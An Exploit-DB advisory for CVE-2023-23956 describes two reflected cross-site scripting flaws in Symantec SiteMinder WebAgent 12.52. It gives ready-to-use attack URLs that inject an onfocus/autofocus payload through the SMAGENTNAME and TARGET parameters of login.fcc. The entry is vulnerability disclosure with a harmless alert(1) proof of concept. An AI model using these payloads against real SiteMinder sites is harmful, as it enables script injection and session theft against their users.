Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)

EDB-ID:

51530




Platform:

Hardware

Date:

2023-06-19


Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
Google Dork: N/A
Date: 18-06-2023
Exploit Author: Harshit Joshi
Vendor Homepage: https://community.broadcom.com/home
Software Link: https://www.broadcom.com/products/identity/siteminder
Version:  12.52
Tested on: Linux, Windows
CVE: CVE-2023-23956
Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221

*Description:*
I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
discovered in the  Symantec SiteMinder WebAgent. The vulnerability is
related to the improper handling of user input and has been assigned the
Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
vulnerability is 5.4.

Vulnerability Details:
---------------------
*Impact:*

This vulnerability allows an attacker to execute arbitrary JavaScript code
in the context of the affected application.

*Steps to Reproduce:*

*First:*

1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22

2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *SMAGENTNAME *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

*Second:*

1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *TARGET *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*